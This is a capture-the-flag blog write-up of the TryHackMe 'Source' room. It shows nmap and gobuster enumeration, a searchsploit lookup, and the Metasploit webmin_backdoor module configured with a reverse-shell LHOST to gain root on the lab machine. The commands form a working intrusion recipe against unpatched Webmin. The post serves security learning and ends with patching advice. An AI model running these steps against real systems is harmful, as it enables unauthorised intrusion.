Challenges: Source (TryHackMe)

JebitokJebitok
3 min read

Table of contents

In this engagement, the goal was to enumerate and compromise the attached machine to identify the root cause of a service disruption and gain full system control. The initial phase focused on reconnaissance, starting with network scanning and web directory enumeration. During this process, I discovered an open management interface on port 10000 running Webmin, which redirected to an AWS EC2 internal hostname. This finding hinted at a potential vulnerability in the Webmin service, making it a prime target for exploitation.

Embark

Enumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?

The Journey by Ekaterina on Dribbble

This virtual machine is also included in the room AttackerKB as part of a guided experience. Additionally, you can download the OVA of Source for offline usage from https://www.darkstar7471.com/resources.html

Started off by enumerating the site:

used nmap to check the open ports

nmap -sV IP_Address

tried to use gobuster but it didn’t reveal anything also used gobuster at port 10000 which was open

gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt

went ahead to check the site on http://IP_Address:10000 and it show an option to redirect to a AWS EC2 instance DNS hostname. ip-10-10-148-184.eu-west-1.compute.internal

redirecting the AWS EC2 instance shows this warning of potential Risk Ahead but we opt to Advance

Advancing redericts us to a site called Webmin which requires login credentials but it’s likely to be available on exploit-db

searchsploit webmin 1.890

Exploit Title | Path

Webmin < 1.920 - 'rpc.cgi' Remote Code Execut | linux/webapps/47330.rb

Shellcodes: No Results

went ahead to use metasploit:

msfconsole

search webmin

found the 10th exploit/linux/http/webmin_backdoor likely what we needed

use 10

show options

set RHOSTS TARGET_IP

set RPORT 10000

set SSL true

set LHOST ATTACK_MACHINE_IP

set LPORT 4444

set ForceExploit true

run

when running the above: I had not set set SSL true and set RPORT 10000 once set and run, it will launch a command line within and it’s escalated to root user and you can find both the user and root flags.

Answer the questions below

  1. user.txt

    find / -type f -name user.txt 2>/dev/null

  2. root.txt

    find / -type f -name root.txt 2>/dev/null

    Through systematic enumeration and targeted exploitation, I leveraged a known Webmin backdoor vulnerability to gain remote command execution on the target. Proper configuration of the exploit parameters allowed me to establish a shell with root privileges, granting full control over the system. Ultimately, I was able to retrieve both the user and root flags, confirming complete compromise of the host. This exercise underscores the importance of keeping administrative services patched and secured, as well as restricting access to critical management interfaces.

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

exploitmetasploittryhackmewebsecurityCTF Writeup

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.